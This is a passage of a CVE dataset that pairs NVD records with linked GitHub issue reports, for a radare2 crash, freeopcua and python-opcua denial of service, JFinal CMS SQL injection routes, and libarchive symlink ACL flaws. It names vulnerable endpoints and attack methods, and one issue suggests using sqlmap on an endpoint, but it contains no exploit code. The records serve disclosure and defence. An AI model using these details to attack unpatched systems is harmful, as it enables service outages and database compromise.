[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/4d3811681a80f92a53e795f6a64c4b0fc2c8dd22" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16215" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/pull/16230" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/4d3811681a80f92a53e795f6a64c4b0fc2c8dd22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16215" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/pull/16230" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "EEE8DA49-FB7A-4416-8942-56DD67E62CD9", "versionEndExcluding": "4.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "908" ]
908
https://github.com/radareorg/radare2/issues/16215
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | radare2 4.3.1 23928 @ linux-x86-64 git.4.3.1-10-g1271d65 commit: 1271d653c7691047284a1de99d209972e3cee6d9 build: 2020-03-11__10:01:54 ### Expected behavior Handle input error ### Actual behavior Segmentation fault ### Steps to reproduce the behavior $ r2 - [0x00000000]> adf Segmentation fault (core dumped) ### Additional Logs, screenshots, source-code, configuration dump, ... ![image](https://user-images.githubusercontent.com/20163299/76677632-888f7d80-660b-11ea-922b-2ac18657b465.png) in `libr/core/anal.c`, when command "adf" has no or wrong argument, `anal_fcn_data (core, input + 1)` --> `RAnalFunction *fcn = r_anal_get_fcn_in (core->anal, core->offset, -1);` returns null pointer for `fnc` cause segmentation fault later in `ensure_fcn_range (fcn);`
command "adf" Segmentation fault
https://api.github.com/repos/radareorg/radare2/issues/16215/comments
1
2020-03-14T07:54:59Z
2020-03-16T16:03:23Z
https://github.com/radareorg/radare2/issues/16215
581,094,359
16,215
4,022
CVE-2022-24298
2022-08-23T05:15:07.760
All versions of package freeopcua/freeopcua are vulnerable to Denial of Service (DoS) when bypassing the limitations for excessive memory consumption by sending multiple CloseSession requests with the deleteSubscription parameter equal to False.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeOpcUa/freeopcua/issues/391" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-UNMANAGED-FREEOPCUAFREEOPCUA-2988720" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeOpcUa/freeopcua/issues/391" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-UNMANAGED-FREEOPCUAFREEOPCUA-2988720" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freeopcua_project:freeopcua:*:*:*:*:*:*:*:*", "matchCriteriaId": "7F2A8BC2-6B2D-47B0-8268-77AA65032C5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/FreeOpcUa/freeopcua/issues/391
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeOpcUa", "freeopcua" ]
We would like to responsibly report on a vulnerability we found in freeopcua (cpp). Where should we send our detailed report? Additionally I would like to suggest adding a security policy to the repository to help other security researchers reach out to you properly. Thanks! Team82 Claroty Research https://claroty.com/team82/
How to report a security issue?
https://api.github.com/repos/FreeOpcUa/freeopcua/issues/391/comments
0
2022-05-23T13:01:50Z
2022-05-23T13:01:50Z
https://github.com/FreeOpcUa/freeopcua/issues/391
1,245,134,139
391
4,023
CVE-2022-25304
2022-08-23T05:15:07.987
All versions of package opcua; all versions of package asyncua are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeOpcUa/python-opcua/issues/1466" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-ASYNCUA-2988731" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-OPCUA-2988730" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeOpcUa/python-opcua/issues/1466" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-ASYNCUA-2988731" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-OPCUA-2988730" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:asyncua_project:asyncua:*:*:*:*:*:python:*:*", "matchCriteriaId": "515536F5-025D-4947-A517-339AE3019B7C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:opcua_project:opcua:*:*:*:*:*:python:*:*", "matchCriteriaId": "4E3BB145-6414-49F0-9D4C-30ABBF0CB7D0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/FreeOpcUa/python-opcua/issues/1466
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeOpcUa", "python-opcua" ]
We would like to responsibly report on a vulnerability we found in python opcua. Where should we send our detailed report? Additionally I would like to suggest adding a security policy to the repository to help other security researchers reach out to you properly. Thanks! Team82 Claroty Research https://claroty.com/team82/
How to report a security issue?
https://api.github.com/repos/FreeOpcUa/python-opcua/issues/1466/comments
6
2022-05-23T12:59:14Z
2022-05-26T11:34:46Z
https://github.com/FreeOpcUa/python-opcua/issues/1466
1,245,130,623
1,466
4,024
CVE-2022-37199
2022-08-23T13:15:08.520
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /jfinal_cms/system/user/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/48" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jflyfox/jfinal_cms/issues/48
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
the route is /jfinal_cms/system/user/list ![c1c9859cc9ea5015f05f68e55fb3695](https://user-images.githubusercontent.com/56295743/181653646-721d4a24-6e65-4ccc-ac85-6bdf49eb4068.jpg) ![f6d64fe8a0e68451dd7a70a0e7d98fb](https://user-images.githubusercontent.com/56295743/181653653-437648a8-c76d-495d-b1ae-2cdf5ca970fb.png) ![6e1b77dfc081f4433ae57e0d788738c](https://user-images.githubusercontent.com/56295743/181653662-e6277d38-1471-419a-b694-72365439f467.png)
There is a SQL injection vulnerability exists in JFinal CMS 5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/48/comments
0
2022-07-28T23:30:08Z
2022-07-28T23:30:08Z
https://github.com/jflyfox/jfinal_cms/issues/48
1,321,592,019
48
4,025
CVE-2022-37223
2022-08-23T14:15:08.633
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /jfinal_cms/system/role/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/49" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/49" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jflyfox/jfinal_cms/issues/49
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
you can use the route /jfinal_cms/system/role/list then use sqlmap attack the interface like this : ![f097bb66a1e76ef93f3834b319a6b30](https://user-images.githubusercontent.com/56295743/181655295-926a52dc-37c0-4f99-81df-64acd5806af2.jpg)
There is a SQL injection vulnerability exists in JFinal CMS 5.1.0 again
https://api.github.com/repos/jflyfox/jfinal_cms/issues/49/comments
0
2022-07-28T23:48:08Z
2022-07-28T23:48:08Z
https://github.com/jflyfox/jfinal_cms/issues/49
1,321,600,614
49
4,026
CVE-2021-23177
2022-08-23T16:15:09.280
An improper link resolution flaw while extracting an archive can lead to changing the access control list (ACL) of the target of the link. An attacker may provide a malicious archive to a victim user, who would trigger this flaw when trying to extract the archive. A local attacker may use this flaw to change the ACL of a file on the system and gain more privileges.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-23177" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024245" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/issues/1565" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-23177" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024245" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/issues/1565" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00030.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libarchive:libarchive:*:*:*:*:*:*:*:*", "matchCriteriaId": "A55FBDE8-F405-4C72-BCDC-756873D578C9", "versionEndExcluding": "3.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "6C3741B8-851F-475D-B428-523F4F722350", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "87C21FE1-EA5C-498F-9C6C-D05F91A88217", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "9EF5C4AC-CA69-41E3-AD93-7AC21931374A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "47811209-5CE5-4375-8391-B0A7F6A0E420", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "729C515E-1DD3-466D-A50B-AFE058FFC94A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "76C24D94-834A-4E9D-8F73-624AFA99AAA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "871A5C26-DB7B-4870-A5B2-5DD24C90B4A7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "1272DF03-7674-4BD4-8E64-94004B195448", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:codeready_linux_builder:-:*:*:*:*:*:*:*", "matchCriteriaId": "1CD81C46-328B-412D-AF4E-68A2AD2F1A73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "6C3741B8-851F-475D-B428-523F4F722350", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "87C21FE1-EA5C-498F-9C6C-D05F91A88217", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "9EF5C4AC-CA69-41E3-AD93-7AC21931374A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "47811209-5CE5-4375-8391-B0A7F6A0E420", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "729C515E-1DD3-466D-A50B-AFE058FFC94A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "59" ]
59
https://github.com/libarchive/libarchive/issues/1565
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libarchive", "libarchive" ]
When an archive entry contains a symbolic link that has defined ACLs on Linux, on extraction the ACLs of the link target are modified. This is because the function acl_set_file() is used without a prior check if the file is not a symbolic link. FreeBSD and MacOS use acl_set_link_np() that does not follow symbolic links.
[SECURITY] Linux: extracting a symlink with ACLs modifies ACLs of target
https://api.github.com/repos/libarchive/libarchive/issues/1565/comments
3
2021-08-21T17:41:51Z
2021-12-17T07:33:13Z
https://github.com/libarchive/libarchive/issues/1565
976,185,621
1,565
4,027
CVE-2021-31566
2022-08-23T16:15:09.337
An improper link resolution flaw can occur while extracting an archive leading to changing modes, times, access control lists, and flags of a file outside of the archive. An attacker may provide a malicious archive to a victim user, who would trigger this flaw when trying to extract the archive. A local attacker may use this flaw to gain more privileges in a system.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-31566" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024237" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/issues/1566" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-31566" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/issues/1566" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00030.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libarchive:libarchive:*:*:*:*:*:*:*:*", "matchCriteriaId": "A55FBDE8-F405-4C72-BCDC-756873D578C9", "versionEndExcluding": "3.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "6C3741B8-851F-475D-B428-523F4F722350", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "87C21FE1-EA5C-498F-9C6C-D05F91A88217", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "9EF5C4AC-CA69-41E3-AD93-7AC21931374A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "47811209-5CE5-4375-8391-B0A7F6A0E420", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "729C515E-1DD3-466D-A50B-AFE058FFC94A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "76C24D94-834A-4E9D-8F73-624AFA99AAA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "871A5C26-DB7B-4870-A5B2-5DD24C90B4A7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "1272DF03-7674-4BD4-8E64-94004B195448", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:codeready_linux_builder:-:*:*:*:*:*:*:*", "matchCriteriaId": "1CD81C46-328B-412D-AF4E-68A2AD2F1A73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { 